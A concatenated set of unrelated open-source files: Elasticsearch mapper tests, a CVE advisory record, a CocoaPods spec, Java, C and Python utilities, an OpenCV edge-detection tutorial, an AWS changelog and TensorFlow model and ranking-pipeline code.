assertEquals(1230, pointField.numericValue().doubleValue(), 0d);
IndexableField dvField = fields[1];
assertEquals(DocValuesType.SORTED_NUMERIC, dvField.fieldType().docValuesType());
IndexableField storedField = fields[2];
assertTrue(storedField.fieldType().stored());
assertEquals(1230, storedField.numericValue().longValue());
}
public void testCoerce() throws Exception {
DocumentMapper mapper = createDocumentMapper(fieldMapping(this::minimalMapping));
ParsedDocument doc = mapper.parse(
new SourceToParse(
"test",
"_doc",
"1",
BytesReference.bytes(XContentFactory.jsonBuilder().startObject().field("field", "123").endObject()),
XContentType.JSON
)
);
IndexableField[] fields = doc.rootDoc().getFields("field");
assertEquals(2, fields.length);
IndexableField pointField = fields[0];
assertEquals(1, pointField.fieldType().pointDimensionCount());
assertEquals(1230, pointField.numericValue().longValue());
IndexableField dvField = fields[1];
assertEquals(DocValuesType.SORTED_NUMERIC, dvField.fieldType().docValuesType());
DocumentMapper mapper2 = createDocumentMapper(
fieldMapping(b -> b.field("type", "scaled_float").field("scaling_factor", 10.0).field("coerce", false))
);
ThrowingRunnable runnable = () -> mapper2.parse(
new SourceToParse(
"test",
"_doc",
"1",
BytesReference.bytes(XContentFactory.jsonBuilder().startObject().field("field", "123").endObject()),
XContentType.JSON
)
);
MapperParsingException e = expectThrows(MapperParsingException.class, runnable);
assertThat(e.getCause().getMessage(), containsString("passed as String"));
}
public void testIgnoreMalformed() throws Exception {
doTestIgnoreMalformed("a", "For input string: \"a\"");
List<String> values = Arrays.asList("NaN", "Infinity", "-Infinity");
for (String value : values) {
doTestIgnoreMalformed(value, "[scaled_float] only supports finite values, but got [" + value + "]");
}
}
private void doTestIgnoreMalformed(String value, String exceptionMessageContains) throws Exception {
DocumentMapper mapper = createDocumentMapper(fieldMapping(this::minimalMapping));
ThrowingRunnable runnable = () -> mapper.parse(
new SourceToParse(
"test",
"_doc",
"1",
BytesReference.bytes(XContentFactory.jsonBuilder().startObject().field("field", value).endObject()),
XContentType.JSON
)
);
MapperParsingException e = expectThrows(MapperParsingException.class, runnable);
assertThat(e.getCause().getMessage(), containsString(exceptionMessageContains));
DocumentMapper mapper2 = createDocumentMapper(
fieldMapping(b -> b.field("type", "scaled_float").field("scaling_factor", 10.0).field("ignore_malformed", true))
);
ParsedDocument doc = mapper2.parse(
new SourceToParse(
"test",
"_doc",
"1",
BytesReference.bytes(XContentFactory.jsonBuilder().startObject().field("field", value).endObject()),
XContentType.JSON
)
);
IndexableField[] fields = doc.rootDoc().getFields("field");
assertEquals(0, fields.length);
}
public void testNullValue() throws IOException {
DocumentMapper mapper = createDocumentMapper(fieldMapping(this::minimalMapping));
ParsedDocument doc = mapper.parse(
new SourceToParse(
"test",
"_doc",
"1",
BytesReference.bytes(XContentFactory.jsonBuilder().startObject().nullField("field").endObject()),
XContentType.JSON
)
);
assertArrayEquals(new IndexableField[0], doc.rootDoc().getFields("field"));
mapper = createDocumentMapper(
fieldMapping(b -> b.field("type", "scaled_float").field("scaling_factor", 10.0).field("null_value", 2.5))
);
doc = mapper.parse(
new SourceToParse(
"test",
"_doc",
"1",
BytesReference.bytes(XContentFactory.jsonBuilder().startObject().nullField("field").endObject()),
XContentType.JSON
)
);
IndexableField[] fields = doc.rootDoc().getFields("field");
assertEquals(2, fields.length);
IndexableField pointField = fields[0];
assertEquals(1, pointField.fieldType().pointDimensionCount());
assertFalse(pointField.fieldType().stored());
assertEquals(25, pointField.numericValue().longValue());
IndexableField dvField = fields[1];
assertEquals(DocValuesType.SORTED_NUMERIC, dvField.fieldType().docValuesType());
assertFalse(dvField.fieldType().stored());
}
/**
* `index_options` was deprecated and is rejected as of 7.0
*/
public void testRejectIndexOptions() {
MapperParsingException e = expectThrows(
MapperParsingException.class,
() -> createMapperService(fieldMapping(b -> b.field("type", "scaled_float").field("index_options", randomIndexOptions())))
);
assertThat(e.getMessage(), containsString("Failed to parse mapping [_doc]: Field [scaling_factor] is required"));
assertWarnings("Parameter [index_options] has no effect on type [scaled_float] and will be removed in future");
}
}
| 5,523 |
7,892 | /* cmupvdbg.h -- cmupv debug function declarations */
/* Normally, this function(s) are not called and the corresponding
* cmupvdbg.c need not be linked
*/
/* See comments in cmupvdbg.c and definitions of MAX_FILES and MAX_SAVE */
/* write_pv_frame -- saves an array of floats as a sound file so you
* can see what is going into the phase vocoder
*/
void write_pv_frame(long zeros, float *ana_frame, long fftsize, char *prefix);
| 137 |
892 | <gh_stars>100-1000
{
"schema_version": "1.2.0",
"id": "GHSA-9h86-j86m-7fx3",
"modified": "2022-04-30T18:10:29Z",
"published": "2022-04-30T18:10:29Z",
"aliases": [
"CVE-1999-0382"
],
"details": "The screen saver in Windows NT does not verify that its security context has been changed properly, allowing attackers to run programs with elevated privileges.",
"severity": [
],
"affected": [
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-1999-0382"
},
{
"type": "WEB",
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/1999/ms99-008"
}
],
"database_specific": {
"cwe_ids": [
],
"severity": "HIGH",
"github_reviewed": false
}
} | 341 |
5,169 | <reponame>Gantios/Specs
{
"name": "HJ_MLeaksFinder",
"version": "1.0.0",
"summary": "Find memory leaks in your iOS app at develop time.",
"homepage": "https://github.com/whhaijun/HJ_MLeaksFinder.git",
"license": "MIT",
"authors": {
"HJ": "<EMAIL>"
},
"source": {
"git": "https://github.com/whhaijun/HJ_MLeaksFinder.git",
"tag": "1.0.0"
},
"platforms": {
"ios": "6.0"
},
"source_files": "MLeaksFinder/**/*"
}
| 203 |
435 | <reponame>amaajemyfren/data
import argparse
from collections import defaultdict
import json
import sys
from tools.utils import get_json_files
def check_ids_unique(data_root, verbose=False):
_, video_paths = get_json_files(data_root)
paths_by_id = defaultdict(list)
for file_path in video_paths:
with open(file_path, encoding='UTF-8') as fp:
blob = json.load(fp)
id_ = blob.get('id')
if id_:
paths_by_id[id_].append(file_path)
keys = list(paths_by_id.keys())
for key in keys:
if len(paths_by_id[key]) <= 1:
del paths_by_id[key]
if paths_by_id:
print('Duplicate IDs found:')
for id_, paths in paths_by_id.items():
print('ID {}'.format(id_))
for path in paths:
print('\t', path)
sys.exit(1)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-d", "--data-root",
help="directory to search for JSON files")
parser.add_argument("-v", "--verbose",
type=int,
help="increase output verbosity")
args = parser.parse_args()
check_ids_unique(args.data_root, verbose=args.verbose)
if __name__ == '__main__':
main()
| 620 |
2,757 | <reponame>CEOALT1/RefindPlusUDK
#
# Copyright (c) 2011-2013, ARM Limited. All rights reserved.
#
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
import os
import firmware_volume
import build_report
import system_table
# Reload external classes
reload(firmware_volume)
reload(build_report)
reload(system_table)
def readMem32(executionContext, address):
bytes = executionContext.getMemoryService().read(address, 4, 32)
return struct.unpack('<I',bytes)[0]
def dump_fv(ec, fv_base, fv_size):
fv = firmware_volume.FirmwareVolume(ec,
int(build.PCDs['gArmTokenSpaceGuid']['PcdFvBaseAddress'][0],16),
int(build.PCDs['gArmTokenSpaceGuid']['PcdFvSize'][0],16))
ffs = fv.get_next_ffs()
while ffs != None:
print "# %s" % ffs
section = ffs.get_next_section()
while section != None:
print "\t%s" % section
try:
print "\t\t- %s" % section.get_debug_filepath()
except Exception:
pass
section = ffs.get_next_section(section)
ffs = fv.get_next_ffs(ffs)
def dump_system_table(ec, mem_base, mem_size):
st = system_table.SystemTable(ec, mem_base, mem_size)
debug_info_table_base = st.get_configuration_table(system_table.DebugInfoTable.CONST_DEBUG_INFO_TABLE_GUID)
debug_info_table = system_table.DebugInfoTable(ec, debug_info_table_base)
debug_info_table.dump()
def load_symbol_from_file(ec, filename, address, verbose = False):
if verbose:
print "Add symbols of %s at 0x%x" % (filename, address)
try:
ec.getImageService().addSymbols(filename, address)
except:
try:
# We could get an exception if the symbols are already loaded
ec.getImageService().unloadSymbols(filename)
ec.getImageService().addSymbols(filename, address)
except:
print "Warning: not possible to load symbols from %s at 0x%x" % (filename, address)
def is_aarch64(ec):
success = True
try:
# Try to access a Aarch64 specific register
ec.getRegisterService().getValue('X0')
except:
success = False
return success
class ArmPlatform:
def __init__(self, sysmembase=None, sysmemsize=None, fvs={}):
self.sysmembase = sysmembase
self.sysmemsize = sysmemsize
self.fvs = fvs
class ArmPlatformDebugger:
system_table = None
firmware_volumes = {}
REGION_TYPE_SYSMEM = 1
REGION_TYPE_ROM = 2
REGION_TYPE_FV = 3
def __init__(self, ec, report_log, regions, verbose = False):
self.ec = ec
self.verbose = verbose
fvs = []
sysmem_base = None
sysmem_size = None
if report_log and os.path.isfile(report_log):
try:
self.build = build_report.BuildReport(report_log)
except IOError:
raise IOError(2, 'Report \'%s\' is not valid' % report_log)
# Generate list of supported Firmware Volumes
if self.build.PCDs['gArmTokenSpaceGuid'].has_key('PcdFvSize') and int(self.build.PCDs['gArmTokenSpaceGuid']['PcdFvSize'][0],16) != 0:
fvs.append((int(self.build.PCDs['gArmTokenSpaceGuid']['PcdFvBaseAddress'][0],16),int(self.build.PCDs['gArmTokenSpaceGuid']['PcdFvSize'][0],16)))
if self.build.PCDs['gArmTokenSpaceGuid'].has_key('PcdSecureFvSize') and int(self.build.PCDs['gArmTokenSpaceGuid']['PcdSecureFvSize'][0],16) != 0:
fvs.append((int(self.build.PCDs['gArmTokenSpaceGuid']['PcdSecureFvBaseAddress'][0],16),int(self.build.PCDs['gArmTokenSpaceGuid']['PcdSecureFvSize'][0],16)))
if self.build.PCDs['gArmTokenSpaceGuid'].has_key('PcdHypFvSize') and int(self.build.PCDs['gArmTokenSpaceGuid']['PcdHypFvSize'][0],16) != 0:
fvs.append((int(self.build.PCDs['gArmTokenSpaceGuid']['PcdHypFvBaseAddress'][0],16),int(self.build.PCDs['gArmTokenSpaceGuid']['PcdHypFvSize'][0],16)))
sysmem_base = int(self.build.PCDs['gArmTokenSpaceGuid']['PcdSystemMemoryBase'][0],16)
sysmem_size = int(self.build.PCDs['gArmTokenSpaceGuid']['PcdSystemMemorySize'][0],16)
else:
for region in regions:
if region[0] == ArmPlatformDebugger.REGION_TYPE_SYSMEM:
sysmem_base = region[1]
sysmem_size = region[2]
elif region[0] == ArmPlatformDebugger.REGION_TYPE_FV:
fvs.append((region[1],region[2]))
elif region[0] == ArmPlatformDebugger.REGION_TYPE_ROM:
for base in xrange(region[1], region[1] + region[2], 0x400000):
signature = struct.unpack("cccc", self.ec.getMemoryService().read(base, 4, 32))
if signature == FirmwareVolume.CONST_FV_SIGNATURE:
fvs.append((base,0))
else:
print "Region type '%d' Not Supported" % region[0]
self.platform = ArmPlatform(sysmem_base, sysmem_size, fvs)
def in_sysmem(self, addr):
return (self.platform.sysmembase is not None) and (self.platform.sysmembase <= addr) and (addr < self.platform.sysmembase + self.platform.sysmemsize)
def in_fv(self, addr):
return (self.get_fv_at(addr) != None)
def get_fv_at(self, addr):
for fv in self.platform.fvs:
if (fv[0] <= addr) and (addr < fv[0] + fv[1]):
return fv
return None
def load_current_symbols(self):
pc = int(self.ec.getRegisterService().getValue('PC')) & 0xFFFFFFFF
if self.in_fv(pc):
debug_infos = []
(fv_base, fv_size) = self.get_fv_at(pc)
if self.firmware_volumes.has_key(fv_base) == False:
self.firmware_volumes[fv_base] = firmware_volume.FirmwareVolume(self.ec, fv_base, fv_size)
stack_frame = self.ec.getTopLevelStackFrame()
info = self.firmware_volumes[fv_base].load_symbols_at(int(stack_frame.getRegisterService().getValue('PC')) & 0xFFFFFFFF, self.verbose)
debug_infos.append(info)
while stack_frame.next() is not None:
stack_frame = stack_frame.next()
# Stack frame attached to 'PC'
pc = int(stack_frame.getRegisterService().getValue('PC')) & 0xFFFFFFFF
# Check if the symbols for this stack frame have already been loaded
found = False
for debug_info in debug_infos:
if (pc >= debug_info[0]) and (pc < debug_info[0] + debug_info[1]):
found = True
if found == False:
info = self.firmware_volumes[fv_base].load_symbols_at(pc)
debug_infos.append(info)
#self.firmware_volumes[fv_base].load_symbols_at(pc)
elif self.in_sysmem(pc):
debug_infos = []
if self.system_table is None:
# Find the System Table
self.system_table = system_table.SystemTable(self.ec, self.platform.sysmembase, self.platform.sysmemsize)
# Find the Debug Info Table
debug_info_table_base = self.system_table.get_configuration_table(system_table.DebugInfoTable.CONST_DEBUG_INFO_TABLE_GUID)
self.debug_info_table = system_table.DebugInfoTable(self.ec, debug_info_table_base)
stack_frame = self.ec.getTopLevelStackFrame()
info = self.debug_info_table.load_symbols_at(int(stack_frame.getRegisterService().getValue('PC')) & 0xFFFFFFFF, self.verbose)
debug_infos.append(info)
while stack_frame.next() is not None:
stack_frame = stack_frame.next()
# Stack frame attached to 'PC'
pc = int(stack_frame.getRegisterService().getValue('PC')) & 0xFFFFFFFF
# Check if the symbols for this stack frame have already been loaded
found = False
for debug_info in debug_infos:
if (pc >= debug_info[0]) and (pc < debug_info[0] + debug_info[1]):
found = True
if found == False:
try:
info = self.debug_info_table.load_symbols_at(pc)
debug_infos.append(info)
except:
pass
#self.debug_info_table.load_symbols_at(pc)
else:
raise Exception('ArmPlatformDebugger', "Not supported region")
def load_all_symbols(self):
# Load all the XIP symbols attached to the Firmware Volume
for (fv_base, fv_size) in self.platform.fvs:
if self.firmware_volumes.has_key(fv_base) == False:
self.firmware_volumes[fv_base] = firmware_volume.FirmwareVolume(self.ec, fv_base, fv_size)
self.firmware_volumes[fv_base].load_all_symbols(self.verbose)
try:
# Load all symbols of module loaded into System Memory
if self.system_table is None:
# Find the System Table
self.system_table = system_table.SystemTable(self.ec, self.platform.sysmembase, self.platform.sysmemsize)
# Find the Debug Info Table
debug_info_table_base = self.system_table.get_configuration_table(system_table.DebugInfoTable.CONST_DEBUG_INFO_TABLE_GUID)
self.debug_info_table = system_table.DebugInfoTable(self.ec, debug_info_table_base)
self.debug_info_table.load_all_symbols(self.verbose)
except:
# Debugger exception could be excepted if DRAM has not been initialized or if we have not started to run from DRAM yet
print "Note: no symbols have been found in System Memory (possible cause: the UEFI permanent memory has been installed yet)"
| 5,117 |
879 | package com.bookstore.repository;
import com.bookstore.dto.BookstoreDto;
import com.bookstore.entity.Author;
import java.util.List;
import org.springframework.data.jpa.repository.JpaRepository;
import org.springframework.data.jpa.repository.Query;
import org.springframework.stereotype.Repository;
import org.springframework.transaction.annotation.Transactional;
@Repository
public interface AuthorRepository extends JpaRepository<Author, Long> {
// Query all author names and their titles with the given price
@Transactional(readOnly = true)
@Query(value = "SELECT a.name AS name, b.title AS title "
+ "FROM Author a INNER JOIN Book b ON a.name = b.name "
+ "WHERE b.price = ?1")
List<BookstoreDto> fetchAuthorNameBookTitleWithPrice(int price);
}
| 282 |
402 |
import tensorflow as tf
import numpy as np
import os
import urllib.request as urlopen
from io import BytesIO
from PIL import Image
import matplotlib
matplotlib.use('TkAgg')
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import matplotlib.patches as patches
import matplotlib.ticker as ticker
class Model:
def __init__(self, checkpoint):
self.confidenceThreshold = 0.9
print('Creating Graph...')
self.detection_graph = tf.Graph()
with self.detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(checkpoint, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
print('...done')
def generate_image_detections(self, image):
with self.detection_graph.as_default():
with tf.Session(graph=self.detection_graph) as sess:
# img_file = BytesIO(urlopen.urlopen(url).read())
# image = Image.open(img_file).convert('RGB')
print('image shape', image.size)
# image = mpimg.imread(url)
imageNP_expanded = np.expand_dims(image, axis=0)
image_tensor = self.detection_graph.get_tensor_by_name('image_tensor:0')
box = self.detection_graph.get_tensor_by_name('detection_boxes:0')
score = self.detection_graph.get_tensor_by_name('detection_scores:0')
clss = self.detection_graph.get_tensor_by_name('detection_classes:0')
num_detections = self.detection_graph.get_tensor_by_name('num_detections:0')
rbboxes = []
# Actual detection
try:
(obox, oscore, oclss, num_detections) = sess.run(
[box, score, clss, num_detections],
feed_dict={image_tensor: imageNP_expanded})
bboxes, scores, classes = obox[0], oscore[0], oclss[0]
#calculate the size
iBox = 0;
box = bboxes[iBox]
dpi = 100
s = image.size
imageHeight = s[1]
imageWidth = s[0]
for iBox,box in enumerate(bboxes):
iScore = scores[iBox]
if iScore < self.confidenceThreshold:
continue
topRel = box[0]
leftRel = box[1]
bottomRel = box[2]
rightRel = box[3]
x = leftRel * imageWidth
y = topRel * imageHeight
w = (rightRel-leftRel) * imageWidth
h = (bottomRel-topRel) * imageHeight
rbboxes.append({
'x': x,
'y': y,
'w': w,
'h': h,
'score': str(iScore),
'class': str(classes[iBox])
})
except Exception as e:
rbboxes = str(e)
return rbboxes
def draw_bounding_box(self, bboxes, image, outputFileName, confidenceThreshold=0.9):
number_of_det = 0
# img_file = BytesIO(urlopen.urlopen(inputFileName).read())
# image = Image.open(img_file).convert('RGB')
s = image.size;
imageHeight = s[1];
imageWidth = s[0]
dpi = 100
figsize = imageWidth / float(dpi), imageHeight / float(dpi)
fig = plt.figure(figsize=figsize)
ax = plt.axes([0,0,1,1])
ax.imshow(image)
ax.set_axis_off()
for iBox,box in enumerate(bboxes):
score = float(box.get('score'))
if score < confidenceThreshold:
continue
iLeft = box.get('x')
iBottom = box.get('y')
w = box.get('w')
h = box.get('h')
rect = patches.Rectangle((iLeft,iBottom),w,h,linewidth=4,edgecolor='r',facecolor='none')
# Add the patch to the Axes
ax.add_patch(rect)
number_of_det += 1
plt.subplots_adjust(top = 1, bottom = 0, right = 1, left = 0, hspace = 0, wspace = 0)
plt.margins(0,0)
ax.xaxis.set_major_locator(ticker.NullLocator())
ax.yaxis.set_major_locator(ticker.NullLocator())
ax.axis('tight')
ax.set(xlim=[0,imageWidth],ylim=[imageHeight,0],aspect=1)
plt.axis('off')
# plt.savefig(outputFileName, bbox_inches='tight', pad_inches=0.0, dpi=dpi, transparent=True)
plt.savefig(outputFileName, dpi=dpi, transparent=True)
return number_of_det
#model configuration
checkpoint = 'checkpoint/frozen_inference_graph.pb'
model = Model(checkpoint)
| 2,959 |
390 | <reponame>kevind-wgu/tinylog
/*
* Copyright 2019 <NAME>
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
* an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
* specific language governing permissions and limitations under the License.
*/
package org.tinylog.throwable;
import java.util.List;
/**
* Immutable storage for throwable data.
*/
public final class ThrowableStore implements ThrowableData {
private String className;
private String message;
private List<StackTraceElement> stackTrace;
private ThrowableData cause;
/**
* @param className
* Class name of the throwable
* @param message
* Message of the throwable
* @param stackTrace
* Stack trace for the throwable
* @param cause
* Cause of the throwable (can be {@code null})
*/
public ThrowableStore(final String className, final String message, final List<StackTraceElement> stackTrace,
final ThrowableData cause) {
this.className = className;
this.message = message;
this.stackTrace = stackTrace;
this.cause = cause;
}
@Override
public String getClassName() {
return className;
}
@Override
public String getMessage() {
return message;
}
@Override
public List<StackTraceElement> getStackTrace() {
return stackTrace;
}
@Override
public ThrowableData getCause() {
return cause;
}
}
| 544 |
348 | <reponame>chamberone/Leaflet.PixiOverlay
{"nom":"Isle","circ":"3ème circonscription","dpt":"Haute-Vienne","inscrits":6266,"abs":2942,"votants":3324,"blancs":307,"nuls":165,"exp":2852,"res":[{"nuance":"REM","nom":"<NAME>","voix":2020},{"nuance":"LR","nom":"M. <NAME>","voix":832}]} | 116 |
2,875 | <reponame>makelove/OpenCV-Python-Tutorial
# -*- coding: utf-8 -*-
'''
Canny 边缘检测是一种 常流 的 缘检测算法 是 <NAME> 在
1986 年提出的。它是一个有很多步构成的算法
由于 缘检测很容易受到噪声影响 所以第一步是使用 5x5 的 斯滤波器 去 噪声
对平滑后的图像使用 Sobel 算子 算水平方向和竖直方向的一 导数 图 像梯度 Gx 和 Gy
梯度的方向一般总是与边界垂直。
梯度方向 归为四类: 垂直 水平 和 两个对角线。
非极大值抑制
滞后阈值
现在 确定 些 界才是真正的边界。 时我们 置两个阈值 minVal 和 maxVal。
当图像的灰度梯度 于 maxVal 时 为是真的边界
那些低于 minVal 的 界会 抛弃。
如果介于两者之间的 就 看这个点是否与某个被确定为真正的边界点相连
如果是就认为它也是边界点 如果不是 就抛弃。
OpenCV 中的 Canny 边界检测
在 OpenCV 中只 需要 一个函数 cv2.Canny() 就可以完成以上几步。
我们看如何使用这个函数。
第一个参数是输入图像。
第二和第三 个分别是 minVal 和 maxVal。
第三个参数 置用来计算图像梯度的 Sobel卷积核的大小 默认值为 3。
最后一个参数是 L2gradient 它可以用来 设定 求梯度大小的方程。
如果 为 True 就会使用我们上 提到 的方程 否则 使用方程 Edge−Gradient (G) = |G2x| + |G2y| 代替, 默认值为 False。
'''
import cv2
import numpy as np
from matplotlib import pyplot as plt
img = cv2.imread('../data/messi5.jpg',0)
edges = cv2.Canny(img, 100, 200)
cv2.imshow('Edges',edges)
cv2.waitKey(0)
# plt.subplot(121), plt.imshow(img, cmap='gray')
# plt.title('Original Image'), plt.xticks([]), plt.yticks([])
# plt.subplot(122), plt.imshow(edges, cmap='gray')
# plt.title('Edge Image'), plt.xticks([]), plt.yticks([])
# plt.show()
| 1,146 |
7,510 | <filename>.changes/1.16.41.json
[
{
"category": "``config``",
"description": "[``botocore``] Update config client to latest version",
"type": "api-change"
},
{
"category": "``ec2``",
"description": "[``botocore``] Update ec2 client to latest version",
"type": "api-change"
},
{
"category": "``glue``",
"description": "[``botocore``] Update glue client to latest version",
"type": "api-change"
},
{
"category": "``batch``",
"description": "[``botocore``] Update batch client to latest version",
"type": "api-change"
},
{
"category": "``managedblockchain``",
"description": "[``botocore``] Update managedblockchain client to latest version",
"type": "api-change"
},
{
"category": "``service-quotas``",
"description": "[``botocore``] Update service-quotas client to latest version",
"type": "api-change"
},
{
"category": "``s3``",
"description": "[``botocore``] Update s3 client to latest version",
"type": "api-change"
},
{
"category": "``connectparticipant``",
"description": "[``botocore``] Update connectparticipant client to latest version",
"type": "api-change"
},
{
"category": "``securityhub``",
"description": "[``botocore``] Update securityhub client to latest version",
"type": "api-change"
},
{
"category": "``qldb-session``",
"description": "[``botocore``] Update qldb-session client to latest version",
"type": "api-change"
},
{
"category": "``outposts``",
"description": "[``botocore``] Update outposts client to latest version",
"type": "api-change"
},
{
"category": "``servicecatalog-appregistry``",
"description": "[``botocore``] Update servicecatalog-appregistry client to latest version",
"type": "api-change"
},
{
"category": "``dms``",
"description": "[``botocore``] Update dms client to latest version",
"type": "api-change"
},
{
"category": "``apigateway``",
"description": "[``botocore``] Update apigateway client to latest version",
"type": "api-change"
}
] | 822 |
879 | <filename>sdk/src/main/java/org/zstack/sdk/GetEcsInstanceVncUrlResult.java
package org.zstack.sdk;
public class GetEcsInstanceVncUrlResult {
public java.lang.String ecsId;
public void setEcsId(java.lang.String ecsId) {
this.ecsId = ecsId;
}
public java.lang.String getEcsId() {
return this.ecsId;
}
public java.lang.String vncUrl;
public void setVncUrl(java.lang.String vncUrl) {
this.vncUrl = vncUrl;
}
public java.lang.String getVncUrl() {
return this.vncUrl;
}
}
| 246 |
4,041 | /*
* Copyright 2019 Web3 Labs Ltd.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
* an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
* specific language governing permissions and limitations under the License.
*/
package org.web3j.protocol.core.methods.response.admin;
import java.io.IOException;
import java.util.List;
import com.fasterxml.jackson.annotation.JsonIgnoreProperties;
import com.fasterxml.jackson.core.JsonParser;
import com.fasterxml.jackson.core.JsonToken;
import com.fasterxml.jackson.core.type.TypeReference;
import com.fasterxml.jackson.databind.DeserializationContext;
import com.fasterxml.jackson.databind.JsonDeserializer;
import com.fasterxml.jackson.databind.ObjectReader;
import com.fasterxml.jackson.databind.annotation.JsonDeserialize;
import org.web3j.protocol.ObjectMapperFactory;
import org.web3j.protocol.core.Response;
/** admin_peers. */
public class AdminPeers extends Response<List<AdminPeers.Peer>> {
@JsonIgnoreProperties(ignoreUnknown = true)
@Override
@JsonDeserialize(using = AdminPeers.ResponseDeserialiser.class)
public void setResult(List<Peer> result) {
super.setResult(result);
}
public static class Peer {
public Peer() {}
public Peer(String id, String name, String enode, PeerNetwork network) {
this.id = id;
this.name = name;
this.network = network;
this.enode = enode;
}
public String getId() {
return id;
}
public String getName() {
return name;
}
public String getEnode() {
return enode;
}
private String id;
private String name;
private PeerNetwork network;
private String enode;
public PeerNetwork getNetwork() {
return network;
}
}
public static class PeerNetwork {
public PeerNetwork() {}
private String localAddress;
private String remoteAddress;
public PeerNetwork(String localAddress, String remoteAddress) {
this.localAddress = localAddress;
this.remoteAddress = remoteAddress;
}
public String getLocalAddress() {
return localAddress;
}
public String getRemoteAddress() {
return remoteAddress;
}
}
public static class ResponseDeserialiser extends JsonDeserializer<List<Peer>> {
private ObjectReader objectReader = ObjectMapperFactory.getObjectReader();
@Override
public List<Peer> deserialize(
JsonParser jsonParser, DeserializationContext deserializationContext)
throws IOException {
if (jsonParser.getCurrentToken() != JsonToken.VALUE_NULL) {
return objectReader.readValue(jsonParser, new TypeReference<List<Peer>>() {});
} else {
return null; // null is wrapped by Optional in above getter
}
}
}
}
| 1,296 |
1,968 | //////////////////////////////////////////////////////////////////////////////
//
// This file is part of the Corona game engine.
// For overview and more information on licensing please refer to README.md
// Home page: https://github.com/coronalabs/corona
// Contact: <EMAIL>
//
//////////////////////////////////////////////////////////////////////////////
#ifndef _Rtt_VideoSource_H__
#define _Rtt_VideoSource_H__
#include "Renderer/Rtt_Texture.h"
// ----------------------------------------------------------------------------
namespace Rtt
{
// ----------------------------------------------------------------------------
typedef enum _Source
{
kCamera,
kCameraFront,
// kFile ???
}
VideoSource;
// ----------------------------------------------------------------------------
} // namespace Rtt
// ----------------------------------------------------------------------------
#endif // _Rtt_VideoSource_H__
| 195 |
2,482 | # Copyright 2021 The TensorFlow Ranking Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Tests for pipeline.py."""
import os
from typing import Dict
from absl.testing import parameterized
import tensorflow as tf
from tensorflow_ranking.python.keras import model as model_lib
from tensorflow_ranking.python.keras import pipeline
from google.protobuf import text_format
from tensorflow_serving.apis import input_pb2
_MASK = "__list_mask__"
_LABEL_FEATURE = "utility"
_PADDING_LABEL = -1
ELWC = text_format.Parse(
"""
context {
features {
feature {
key: "cf_1"
value { float_list { value: 1.0 } }
}
}
}
examples {
features {
feature {
key: "custom_features_1"
value { float_list { value: 1.0 } }
}
feature {
key: "custom_features_2"
value { float_list { value: 1.0 } }
}
feature {
key: "utility"
value { float_list { value: 0.0 } }
}
}
}
examples {
features {
feature {
key: "custom_features_1"
value { float_list { value: 1.0 } }
}
feature {
key: "custom_features_3"
value { float_list { value: 1.0 } }
}
feature {
key: "utility"
value { float_list { value: 1.0 } }
}
}
}
""", input_pb2.ExampleListWithContext())
EXAMPLE_PROTO_1 = text_format.Parse(
"""
features {
feature {
key: "cf_1"
value { float_list { value: 1.0 } }
}
feature {
key: "custom_features_1"
value { float_list { value: 1.0 } }
}
feature {
key: "custom_features_2"
value { float_list { value: 1.0 } }
}
feature {
key: "utility"
value { float_list { value: 0.0 } }
}
}
""", tf.train.Example())
EXAMPLE_PROTO_2 = text_format.Parse(
"""
features {
feature {
key: "cf_1"
value { float_list { value: 1.0 } }
}
feature {
key: "custom_features_1"
value { float_list { value: 1.0 } }
}
feature {
key: "custom_features_3"
value { float_list { value: 1.0 } }
}
feature {
key: "utility"
value { float_list { value: 1.0 } }
}
}
""", tf.train.Example())
class DummyMultiTaskScorer(model_lib.UnivariateScorer):
def _score_flattened(
self,
context_features: Dict[str, tf.Tensor],
example_features: Dict[str, tf.Tensor],
) -> Dict[str, tf.Tensor]:
f = next(iter(example_features.values()))
return {
"task1": tf.keras.layers.Dense(1)(f),
"task2": tf.keras.layers.Dense(1)(f),
}
class PipelineTest(tf.test.TestCase, parameterized.TestCase):
@parameterized.named_parameters(
("Local", None), ("Mirrored", "MirroredStrategy"),
("MultiWorker", "MultiWorkerMirroredStrategy"))
def test_pipeline_with_feature_specs(self, strategy):
data_dir = self.create_tempdir()
data_file = os.path.join(data_dir, "elwc.tfrecord")
if tf.io.gfile.exists(data_file):
tf.io.gfile.remove(data_file)
with tf.io.TFRecordWriter(data_file) as writer:
for _ in range(256):
writer.write(ELWC.SerializeToString())
model_dir = os.path.join(data_dir, "model")
dataset_hparams = pipeline.DatasetHparams(
train_input_pattern=data_file,
valid_input_pattern=data_file,
train_batch_size=128,
valid_batch_size=128,
list_size=2,
dataset_reader=tf.data.TFRecordDataset,
convert_labels_to_binary=False)
pipeline_hparams = pipeline.PipelineHparams(
model_dir=model_dir,
